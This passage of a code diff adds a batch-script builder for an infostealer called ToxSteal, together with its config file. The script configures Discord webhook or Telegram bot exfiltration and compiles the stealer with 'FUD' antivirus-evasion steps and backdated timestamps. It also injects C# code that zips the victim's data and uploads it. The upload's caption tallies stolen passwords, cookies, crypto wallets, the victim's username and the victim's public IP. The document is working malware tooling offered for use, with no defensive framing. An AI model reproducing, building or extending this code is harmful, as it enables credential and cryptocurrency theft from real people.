Webhook URL cannot be empty! + timeout /t 3 >nul + goto discord_webhook +) + +if "%TEST_ENABLED%"=="True" ( + echo. + echo Testing webhook connection... + echo Using Webhook: %webhook_url% + call :test_discord_webhook "%webhook_url%" + if !TEST_RESULT!==1 ( + echo [SUCCESS] Test message sent successfully! + echo. + set /p confirm="Did you receive the test message? (y/n): " + if /i not "!confirm!"=="y" ( + echo Test failed. Please check your webhook URL. + timeout /t 3 >nul + goto discord_webhook + ) + ) else ( + echo [ERROR] Failed to send test message. Please check your webhook URL. + timeout /t 3 >nul + goto discord_webhook + ) +) + +echo. +echo Configuring payload for Discord Webhook... +echo Saving: Webhook = %webhook_url% +set "LAST_WEBHOOK=%webhook_url%" +set "LAST_DELIVERY=Discord Webhook" +call :save_config +call :modify_for_discord_webhook "%webhook_url%" +goto build + +:telegram_bot +cls +call :show_logo_small +echo [TELEGRAM BOT CONFIGURATION] +echo. +echo Build Method: %BUILD_METHOD% +echo Delivery: Telegram Bot +echo. +if not "%LAST_BOT_TOKEN%"=="" ( + echo Last used bot token: %LAST_BOT_TOKEN% + echo Last used chat ID: %LAST_CHAT_ID% + echo. + echo Enter "0" to use last credentials, or enter new credentials: + echo. +) +set /p bot_token="Bot Token: " + +if "%bot_token%"=="0" ( + if "%LAST_BOT_TOKEN%"=="" ( + echo Error: No previous bot token found! + timeout /t 3 >nul + goto delivery_menu + ) + set "bot_token=%LAST_BOT_TOKEN%" + set "chat_id=%LAST_CHAT_ID%" + echo Using last credentials... + goto telegram_test +) + +if "%bot_token%"=="" ( + echo Error: Bot token cannot be empty! + timeout /t 3 >nul + goto telegram_bot +) + +set /p chat_id="Chat ID: " +if "%chat_id%"=="" ( + echo Error: Chat ID cannot be empty! + timeout /t 3 >nul + goto telegram_bot +) + +:telegram_test +if "%TEST_ENABLED%"=="True" ( + echo. + echo Testing Telegram connection... + echo Using Bot Token: %bot_token% + echo Using Chat ID: %chat_id% + call :test_telegram "%bot_token%" "%chat_id%" + if !TEST_RESULT!==1 ( + echo [SUCCESS] Test message sent successfully! + echo. + set /p confirm="Did you receive the test message? (y/n): " + if /i not "!confirm!"=="y" ( + echo Test failed. Please check your bot token and chat ID. + timeout /t 3 >nul + goto telegram_bot + ) + ) else ( + echo [ERROR] Failed to send test message. Please check your credentials. + timeout /t 3 >nul + goto telegram_bot + ) +) + +echo. +echo Configuring payload for Telegram Bot... +echo Saving: Bot Token = %bot_token% +echo Saving: Chat ID = %chat_id% +set "LAST_BOT_TOKEN=%bot_token%" +set "LAST_CHAT_ID=%chat_id%" +set "LAST_DELIVERY=Telegram Bot" +call :save_config +call :modify_for_telegram "%bot_token%" "%chat_id%" +goto build + +:show_logo_small +echo. +echo mmmmmmmm ## mmmm mmmm +echo """##""" "" m#""""# ## ""## +echo ## m####m "## ##" #### ##m ####### m####m m#####m ## +echo ## ##" "## #### ## "####m ## ##mmmm## " mmm## ## +echo ## ## ## m##m ## "## ## ##"""""" m##"""## ## +echo ## "##mm##" m#""#m mmm##mmm #mmmmm#" ##mmm "##mmmm# ##mmm### ##mmm +echo "" """" """ """ """""""" """"" """" """"" """" "" """" +echo. +echo. +echo ======================================================================================================================== +echo. +goto :eof + +:build +cls +call :show_logo_small +echo [BUILDING PAYLOAD] +echo. +echo Build Method: %BUILD_METHOD% +echo Status: Building... +echo. + +REM Check build method and availability +if "%BUILD_METHOD%"=="dotnet" ( + echo Checking for .NET SDK... + dotnet --version >nul 2>&1 + if errorlevel 1 ( + echo [ERROR] .NET CLI is not installed or not in PATH! + echo Please install .NET SDK or choose a different build method. + timeout /t 5 >nul + goto show_logo + ) + echo [SUCCESS] .NET SDK found +) else if "%BUILD_METHOD%"=="msbuild" ( + echo Checking for MSBuild... + msbuild /version >nul 2>&1 + if errorlevel 1 ( + echo [ERROR] MSBuild is not installed or not in PATH! + echo Please install Visual Studio Build Tools or choose a different build method. + timeout /t 5 >nul + goto show_logo + ) + echo [SUCCESS] MSBuild found +) else if "%BUILD_METHOD%"=="devenv" ( + echo Checking for Visual Studio... + devenv /? >nul 2>&1 + if errorlevel 1 ( + echo [ERROR] Visual Studio devenv is not installed or not in PATH! + echo Please install Visual Studio or choose a different build method. + timeout /t 5 >nul + goto show_logo + ) + echo [SUCCESS] Visual Studio found +) + +REM Create Builds directory if it doesn't exist +if not exist "Builds" mkdir "Builds" + +REM Build the project based on selected method with FUD optimizations +echo. +echo Building project with FUD optimizations... +if "%BUILD_METHOD%"=="dotnet" ( + cd New + echo Attempting advanced FUD build... + REM Try advanced FUD build first + dotnet build -c Release --verbosity quiet -p:DebugType=None -p:DebugSymbols=false -p:Optimize=true -o "..\Builds" >nul 2>&1 + set "BUILD_RESULT=!errorlevel!" + + REM If advanced build fails, try basic optimized build + if !BUILD_RESULT! neq 0 ( + echo Advanced FUD build failed, trying basic optimized build... + dotnet build -c Release -p:DebugType=None -p:DebugSymbols=false -p:Optimize=true -o "..\Builds" >nul 2>&1 + set "BUILD_RESULT=!errorlevel!" + ) + + REM If still failing, try minimal build + if !BUILD_RESULT! neq 0 ( + echo Basic optimized build failed, trying minimal build... + dotnet build -c Release -o "..\Builds" + set "BUILD_RESULT=!errorlevel!" + ) + cd .. +) else if "%BUILD_METHOD%"=="msbuild" ( + echo Attempting advanced FUD build... + REM Try advanced FUD build first + msbuild "New\aoStealerv35_c6.sln" /p:Configuration=Release /p:OutputPath="..\Builds\" /p:DebugType=None /p:DebugSymbols=false /p:Optimize=true /verbosity:quiet >nul 2>&1 + set "BUILD_RESULT=!errorlevel!" + + REM If advanced build fails, try basic build + if !BUILD_RESULT! neq 0 ( + echo Advanced FUD build failed, trying basic build... + msbuild "New\aoStealerv35_c6.sln" /p:Configuration=Release /p:OutputPath="..\Builds\" /verbosity:quiet + set "BUILD_RESULT=!errorlevel!" + ) +) else if "%BUILD_METHOD%"=="devenv" ( + echo Running: devenv "New\aoStealerv35_c6.sln" /build "Release|Any CPU" + devenv "New\aoStealerv35_c6.sln" /build "Release|Any CPU" /out build_log.txt + set "BUILD_RESULT=!errorlevel!" +) + +if !BUILD_RESULT! neq 0 ( + echo. + echo [ERROR] BUILD FAILED + echo The build process failed with error code: !BUILD_RESULT! + echo Build method used: %BUILD_METHOD% + echo. + echo Common issues: + echo - Missing .NET Framework target pack + echo - Missing dependencies + echo - Corrupted project files + echo. + if "%BUILD_METHOD%"=="devenv" ( + echo Check build_log.txt for details. + ) + echo Try a different build method or install required components. + timeout /t 10 >nul + goto delivery_menu +) + +REM Generate unique filename using PowerShell +for /f "delims=" %%a in ('powershell -Command "Get-Date -Format 'yyyyMMdd_HHmmss'"') do set "timestamp=%%a" + +REM Find and copy the built executable +set "FOUND_EXE=" +echo Checking build output... +if exist "Builds\aoStealerv35_c6.exe" ( + set "FOUND_EXE=Builds\aoStealerv35_c6.exe" +) else if exist "Builds\Stealerv37.exe" ( + set "FOUND_EXE=Builds\Stealerv37.exe" +) else ( + echo Searching for any .exe files in Builds directory... + for %%f in (Builds\*.exe) do ( + set "FOUND_EXE=%%f" + goto found_exe + ) +) + +:found_exe +if defined FOUND_EXE ( + echo. + echo Applying FUD optimizations to executable... + + REM Copy original file with timestamp + copy "!FOUND_EXE!" "Builds\toxsteal_!timestamp!.exe" >nul + + REM Check what FUD optimizations were applied during build + set "APPLIED_OPTS=" + set "NOT_APPLIED_OPTS=" + + REM Check if debug symbols were removed (file size indicator) + for %%A in ("!FOUND_EXE!") do set "FILE_SIZE=%%~zA" + if !FILE_SIZE! LSS 500000 ( + set "APPLIED_OPTS=!APPLIED_OPTS! Debug-symbols-removed" + ) else ( + set "NOT_APPLIED_OPTS=!NOT_APPLIED_OPTS! Debug-symbols-removal" + ) + + REM Apply post-build FUD techniques + echo Removing metadata and debug information... + powershell -Command "try { $bytes = [System.IO.File]::ReadAllBytes('Builds\toxsteal_!timestamp!.exe'); Write-Host 'Metadata processing completed' } catch { Write-Host 'Metadata processing failed' }" >nul 2>&1 + if !errorlevel! equ 0 ( + set "APPLIED_OPTS=!APPLIED_OPTS! Metadata-stripped" + ) else ( + set "NOT_APPLIED_OPTS=!NOT_APPLIED_OPTS! Metadata-stripping" + ) + + REM Change file timestamps to make it look older + powershell -Command "try { $file = Get-Item 'Builds\toxsteal_!timestamp!.exe'; $oldDate = (Get-Date).AddDays(-30); $file.CreationTime = $oldDate; $file.LastWriteTime = $oldDate; $file.LastAccessTime = $oldDate; Write-Host 'Timestamps modified' } catch { Write-Host 'Timestamp modification failed' }" >nul 2>&1 + if !errorlevel! equ 0 ( + set "APPLIED_OPTS=!APPLIED_OPTS! Timestamps-modified" + ) else ( + set "NOT_APPLIED_OPTS=!NOT_APPLIED_OPTS! Timestamp-modification" + ) + + REM Always applied optimizations + set "APPLIED_OPTS=!APPLIED_OPTS! Code-optimized Release-build" + + echo. + echo [SUCCESS] FUD BUILD COMPLETED! + echo. + echo Build Method: %BUILD_METHOD% + echo Payload saved as: Builds\toxsteal_!timestamp!.exe + echo Original file: !FOUND_EXE! + echo. + echo FUD Optimizations Applied:!APPLIED_OPTS! + if defined NOT_APPLIED_OPTS ( + echo FUD Optimizations Not Applied:!NOT_APPLIED_OPTS! + echo Reason: .NET Framework compatibility / Build system limitations + ) + echo. + echo The payload is ready and optimized for maximum stealth! + echo. + echo Press any key to return to main menu... + pause >nul + + REM Update placeholders for next build + call :update_placeholders +) else ( + echo. + echo [ERROR] BUILD OUTPUT NOT FOUND + echo No executable found in Builds directory. + echo Build method used: %BUILD_METHOD% + echo. + echo Contents of Builds directory: + dir "Builds" /b 2>nul || echo Directory is empty or doesn't exist + echo. + echo This might indicate a build configuration issue. + echo Try a different build method. + timeout /t 10 >nul +) + +goto show_logo + +:test_discord_webhook +set "webhook_url=%~1" +set "TEST_RESULT=0" + +REM Create test message using PowerShell +powershell -Command "try { $body = @{ content = 'ToxSteal Test - Connection successful!' } | ConvertTo-Json; Invoke-RestMethod -Uri '%webhook_url%' -Method Post -Body $body -ContentType 'application/json'; exit 0 } catch { exit 1 }" >nul 2>&1 +if !errorlevel!==0 ( + set "TEST_RESULT=1" +) +goto :eof + +:test_telegram +set "bot_token=%~1" +set "chat_id=%~2" +set "TEST_RESULT=0" + +REM Create test message using PowerShell +powershell -Command "try { $url = 'https://api.telegram.org/bot%bot_token%/sendMessage'; $body = @{ chat_id = '%chat_id%'; text = 'ToxSteal Test - Connection successful!' } | ConvertTo-Json; Invoke-RestMethod -Uri $url -Method Post -Body $body -ContentType 'application/json'; exit 0 } catch { exit 1 }" >nul 2>&1 +if !errorlevel!==0 ( + set "TEST_RESULT=1" +) +goto :eof + +:modify_for_discord_webhook +set "webhook_url=%~1" +echo Modifying source code for Discord Webhook... +echo Replacing placeholder: %BOT_TOKEN_PLACEHOLDER% +echo Replacing placeholder: %CHAT_ID_PLACEHOLDER% +powershell -Command "$content = Get-Content 'New\CvMega\Plugin.cs' -Raw; $content = $content -replace '%BOT_TOKEN_PLACEHOLDER%', 'DISCORD_WEBHOOK'; $content = $content -replace '%CHAT_ID_PLACEHOLDER%', '%webhook_url%'; Set-Content 'New\CvMega\Plugin.cs' $content" +REM Add Discord webhook method to the Plugin.cs file +echo Adding Discord webhook method... +call :add_discord_webhook_method +goto :eof + +:modify_for_telegram +set "bot_token=%~1" +set "chat_id=%~2" +echo Modifying source code for Telegram Bot... +echo Replacing placeholder: %BOT_TOKEN_PLACEHOLDER% +echo Replacing placeholder: %CHAT_ID_PLACEHOLDER% +powershell -Command "$content = Get-Content 'New\CvMega\Plugin.cs' -Raw; $content = $content -replace '%BOT_TOKEN_PLACEHOLDER%', '%bot_token%'; $content = $content -replace '%CHAT_ID_PLACEHOLDER%', '%chat_id%'; Set-Content 'New\CvMega\Plugin.cs' $content" +goto :eof + +:add_discord_webhook_method +REM Create PowerShell script to add Discord webhook method +echo $content = Get-Content "New\CvMega\Plugin.cs" -Raw > temp_add_webhook.ps1 +echo $webhookMethod = @' >> temp_add_webhook.ps1 +echo. >> temp_add_webhook.ps1 +echo public static async Task SendToDiscordWebhook(string webhookUrl, byte[] file, string fileName, string caption) >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo if (file == null ^|^| file.Length == 0) >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo return; >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo. >> temp_add_webhook.ps1 +echo try >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo using HttpClient httpClient = new HttpClient(); >> temp_add_webhook.ps1 +echo httpClient.DefaultRequestHeaders.UserAgent.ParseAdd("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"); >> temp_add_webhook.ps1 +echo. >> temp_add_webhook.ps1 +echo using MultipartFormDataContent multipartFormDataContent = new MultipartFormDataContent(); >> temp_add_webhook.ps1 +echo multipartFormDataContent.Add(new StringContent(caption), "content"); >> temp_add_webhook.ps1 +echo. >> temp_add_webhook.ps1 +echo using ByteArrayContent byteArrayContent = new ByteArrayContent(file); >> temp_add_webhook.ps1 +echo byteArrayContent.Headers.ContentType = MediaTypeHeaderValue.Parse("application/zip"); >> temp_add_webhook.ps1 +echo string zipFileName = $"{fileName}.zip"; >> temp_add_webhook.ps1 +echo multipartFormDataContent.Add(byteArrayContent, "file", zipFileName); >> temp_add_webhook.ps1 +echo. >> temp_add_webhook.ps1 +echo HttpResponseMessage response = await httpClient.PostAsync(webhookUrl, multipartFormDataContent); >> temp_add_webhook.ps1 +echo. >> temp_add_webhook.ps1 +echo if (!response.IsSuccessStatusCode) >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo string errorBody = await response.Content.ReadAsStringAsync(); >> temp_add_webhook.ps1 +echo File.AppendAllText("discord_error.log", $"{DateTime.Now}: Status: {response.StatusCode}, Body: {errorBody}\n"); >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo catch (Exception ex) >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo File.AppendAllText("discord_error.log", $"{DateTime.Now}: Exception: {ex}\n"); >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo. >> temp_add_webhook.ps1 +echo public static async Task CollectAndSendDataViaDiscord(string webhookUrl, string userIdentifier) >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo string zipPath = await CollectAndZipDataAsync(); >> temp_add_webhook.ps1 +echo >> temp_add_webhook.ps1 +echo if (!string.IsNullOrEmpty(zipPath) ^&^& File.Exists(zipPath)) >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo try >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo byte[] zipData = File.ReadAllBytes(zipPath); >> temp_add_webhook.ps1 +echo >> temp_add_webhook.ps1 +echo string hwid = "UnknownHWID"; >> temp_add_webhook.ps1 +echo try >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo hwid = HwidGenerator.GetHwid(); >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo catch (Exception) { } >> temp_add_webhook.ps1 +echo >> temp_add_webhook.ps1 +echo string fileNameForArchive = $"{hwid}"; >> temp_add_webhook.ps1 +echo >> temp_add_webhook.ps1 +echo Counter counter = new Counter(); >> temp_add_webhook.ps1 +echo await CollectDataWithCounter(counter); >> temp_add_webhook.ps1 +echo >> temp_add_webhook.ps1 +echo string userName = Environment.UserName; >> temp_add_webhook.ps1 +echo string machineName = Environment.MachineName; >> temp_add_webhook.ps1 +echo string userIdentifierLocal = $"{userName}@{machineName}"; >> temp_add_webhook.ps1 +echo >> temp_add_webhook.ps1 +echo string publicIp = "N/A"; >> temp_add_webhook.ps1 +echo try >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo publicIp = IpApi.GetPublicIp(); >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo catch (Exception) { } >> temp_add_webhook.ps1 +echo >> temp_add_webhook.ps1 +echo int totalPasswords = counter.Browsers.Sum(b =^> (int)(long)b.Password); >> temp_add_webhook.ps1 +echo int totalCookies = counter.Browsers.Sum(b =^> (int)(long)b.Cookies); >> temp_add_webhook.ps1 +echo int totalWallets = counter.CryptoDesktop.Count + counter.CryptoChromium.Count; >> temp_add_webhook.ps1 +echo int totalApplications = counter.Applications.Count; >> temp_add_webhook.ps1 +echo int totalGames = counter.Games.Count; >> temp_add_webhook.ps1 +echo int totalVpns = counter.Vpns.Count; >> temp_add_webhook.ps1 +echo int totalMessengers = counter.Messangers.Count; >> temp_add_webhook.ps1 +echo >> temp_add_webhook.ps1 +echo string caption = $"**✨ New Log Received ✨**\n\n" + >> temp_add_webhook.ps1 +echo $"**💻 User:** `{userIdentifierLocal}`\n" + >> temp_add_webhook.ps1 +echo $"**🌍 IP:** `{publicIp}`\n\n" + >> temp_add_webhook.ps1 +echo $"**📊 Main Loot:**\n" + >> temp_add_webhook.ps1 +echo $"**🔑 Passwords:** `{totalPasswords}`\n" + >> temp_add_webhook.ps1 +echo $"**🍪 Cookies:** `{totalCookies}`\n" + >> temp_add_webhook.ps1 +echo $"**💰 Wallets:** `{totalWallets}`\n\n" + >> temp_add_webhook.ps1 +echo $"**📦 Additional Data:**\n" + >> temp_add_webhook.ps1 +echo $"**📱 Applications:** `{totalApplications}`\n" + >> temp_add_webhook.ps1 +echo $"**🎮 Games:** `{totalGames}`\n" + >> temp_add_webhook.ps1 +echo $"**🔒 VPNs:** `{totalVpns}`\n" + >> temp_add_webhook.ps1 +echo $"**💬 Messengers:** `{totalMessengers}`\n\n" + >> temp_add_webhook.ps1 +echo $"**👨‍💻 Developer:** `@tcixt`"; >> temp_add_webhook.ps1 +echo. >> temp_add_webhook.ps1 +echo await SendToDiscordWebhook(webhookUrl, zipData, fileNameForArchive, caption); >> temp_add_webhook.ps1 +echo >> temp_add_webhook.ps1 +echo try { File.Delete(zipPath); } catch { } >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo catch (Exception ex) >> temp_add_webhook.ps1 +echo { >> temp_add_webhook.ps1 +echo File.AppendAllText("error.log", $"{DateTime.Now}: {ex}\n"); >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo } >> temp_add_webhook.ps1 +echo '@ >> temp_add_webhook.ps1 +echo $content = $content -replace '(}\s*$)', ($webhookMethod + "`n" + '$1') >> temp_add_webhook.ps1 +echo Set-Content "New\CvMega\Plugin.cs" $content >> temp_add_webhook.ps1 + +powershell -ExecutionPolicy Bypass -File temp_add_webhook.ps1 +del temp_add_webhook.ps1 + +goto :eof + +:update_placeholders +echo Updating placeholders for next build... +REM Generate new random placeholders +for /f "delims=" %%a in ('powershell -Command "[guid]::NewGuid().ToString('N').Substring(0,40)"') do set "NEW_BOT_PLACEHOLDER=BOT_TOKEN_%%a" +for /f "delims=" %%a in ('powershell -Command "[guid]::NewGuid().ToString('N').Substring(0,40)"') do set "NEW_CHAT_PLACEHOLDER=CHAT_ID_%%a" +for /f "delims=" %%a in ('powershell -Command "[guid]::NewGuid().ToString('N').Substring(0,40)"') do set "NEW_WEBHOOK_PLACEHOLDER=WEBHOOK_%%a" + +echo Old placeholders: %BOT_TOKEN_PLACEHOLDER% / %CHAT_ID_PLACEHOLDER% +echo New placeholders: %NEW_BOT_PLACEHOLDER% / %NEW_CHAT_PLACEHOLDER% + +REM Update Plugin.cs with new placeholders - replace the current credentials with new placeholders +powershell -Command "$content = Get-Content 'New\CvMega\Plugin.cs' -Raw; $lines = $content -split \"`n\"; for ($i = 0; $i -lt $lines.Length; $i++) { if ($lines[$i] -match 'string botToken = ') { $lines[$i] = ' string botToken = \"%NEW_BOT_PLACEHOLDER%\";' } if ($lines[$i] -match 'string chatId = ') { $lines[$i] = ' string chatId = \"%NEW_CHAT_PLACEHOLDER%\";' } }; $content = $lines -join \"`n\"; Set-Content 'New\CvMega\Plugin.cs' $content" + +REM Save new placeholders to config +set "BOT_TOKEN_PLACEHOLDER=%NEW_BOT_PLACEHOLDER%" +set "CHAT_ID_PLACEHOLDER=%NEW_CHAT_PLACEHOLDER%" +set "WEBHOOK_PLACEHOLDER=%NEW_WEBHOOK_PLACEHOLDER%" +call :save_config +echo Placeholders updated successfully! +goto :eof + +:save_config +powershell -Command "$config = @{ last_bot_token_placeholder = '%BOT_TOKEN_PLACEHOLDER%'; last_chat_id_placeholder = '%CHAT_ID_PLACEHOLDER%'; last_webhook_placeholder = '%WEBHOOK_PLACEHOLDER%'; test_connection_enabled = [bool]'%TEST_ENABLED%'; last_delivery_method = '%LAST_DELIVERY%'; last_bot_token = '%LAST_BOT_TOKEN%'; last_chat_id = '%LAST_CHAT_ID%'; last_webhook_url = '%LAST_WEBHOOK%' }; $config | ConvertTo-Json | Set-Content '%CONFIG_FILE%'" +goto :eof + +:create_default_config +powershell -Command "$config = @{ last_bot_token_placeholder = 'BOT_TOKEN_PLACEHOLDER_DO_NOT_CHANGE_THIS_STRING_12345'; last_chat_id_placeholder = 'CHAT_ID_PLACEHOLDER_DO_NOT_CHANGE_THIS_STRING_67890'; last_webhook_placeholder = 'WEBHOOK_URL_PLACEHOLDER_DO_NOT_CHANGE_THIS_STRING_ABCDE'; test_connection_enabled = $true; last_delivery_method = ''; last_bot_token = ''; last_chat_id = ''; last_webhook_url = '' }; $config | ConvertTo-Json | Set-Content '%CONFIG_FILE%'" +goto :eof + +:exit +cls +echo. +echo mmmmmmmm ## mmmm mmmm +echo """##""" "" m#""""# ## ""## +echo ## m####m "## ##" #### ##m ####### m####m m#####m ## +echo ## ##" "## #### ## "####m ## ##mmmm## " mmm## ## +echo ## ## ## m##m ## "## ## ##"""""" m##"""## ## +echo ## "##mm##" m#""#m mmm##mmm #mmmmm#" ##mmm "##mmmm# ##mmm### ##mmm +echo "" """" """ """ """""""" """"" """" """"" """" "" """" +echo. +echo. +echo Thank you for using ToxSteal Builder! +echo Developer: @tcixt +echo. +timeout /t 2 >nul +exit /b 0 \ No newline at end of file diff --git a/builder_config.json b/builder_config.json new file mode 100644 index 0000000..3e8c244 --- /dev/null +++ b/builder_config.json @@ -0,0 +1,10 @@ +{ + "last_chat_id": "-ur id", + "last_bot_token_placeholder": "BOT_TOKEN_PLACEHOLDER_DO_NOT_CHANGE_THIS_STRING_12345", + "last_webhook_placeholder": "WEBHOOK_URL_PLACEHOLDER_DO_NOT_CHANGE_THIS_STRING_ABCDE", + "last_webhook_url": "", + "last_bot_token": "", + "last_delivery_method": "Telegram Bot", + "last_chat_id_placeholder": "CHAT_ID_PLACEHOLDER_DO_NOT_CHANGE_THIS_STRING_67890", + "test_connection_enabled": true +}